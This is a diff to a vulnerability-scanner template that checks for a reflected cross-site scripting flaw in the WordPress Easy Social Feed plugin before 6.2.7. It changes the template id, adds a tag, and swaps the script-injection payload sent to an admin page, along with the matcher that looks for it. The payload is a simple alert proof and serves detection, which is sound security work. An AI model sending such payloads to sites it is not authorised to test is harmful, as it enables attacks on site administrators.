--- a/vulnerabilities/wordpress/easy-social-feed.yaml
+++ b/vulnerabilities/wordpress/easy-social-feed.yaml
@@ -1,4 +1,4 @@
-id: easy-facebook-likebox-xss
+id: easy-social-feed
 
 info:
   name: Easy Social Feed < 6.2.7 - Reflected Cross-Site Scripting (XSS)
@@ -6,7 +6,7 @@ info:
   severity: medium
   description: The plugin does not sanitise and escape a parameter before outputting back in an admin dashboard page, leading to a reflected Cross-Site Scripting issue which will be executed in the context of a logged admin or editor.
   reference: https://wpscan.com/vulnerability/6dd00198-ef9b-4913-9494-e08a95e7f9a0
-  tags: wordpress,wp-plugin,xss
+  tags: wordpress,wp-plugin,xss,wp
 
 requests:
   - raw:
@@ -19,7 +19,7 @@ requests:
 
         log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
       - |
-        GET /wp-admin/admin.php?page=easy-facebook-likebox&access_token=a&type=</script><script>alert(/XSS/)</script> HTTP/1.1
+        GET /wp-admin/admin.php?page=easy-facebook-likebox&access_token=a&type=</script><script>alert(document.domain)</script> HTTP/1.1
         Host: {{Hostname}}
 
     cookie-reuse: true
@@ -28,7 +28,7 @@ requests:
       - type: word
         part: body
         words:
-          - "</script><script>alert(/XSS/)</script>"
+          - "'type' : '</script><script>alert(document.domain)</script>'"
 
       - type: word
         part: header
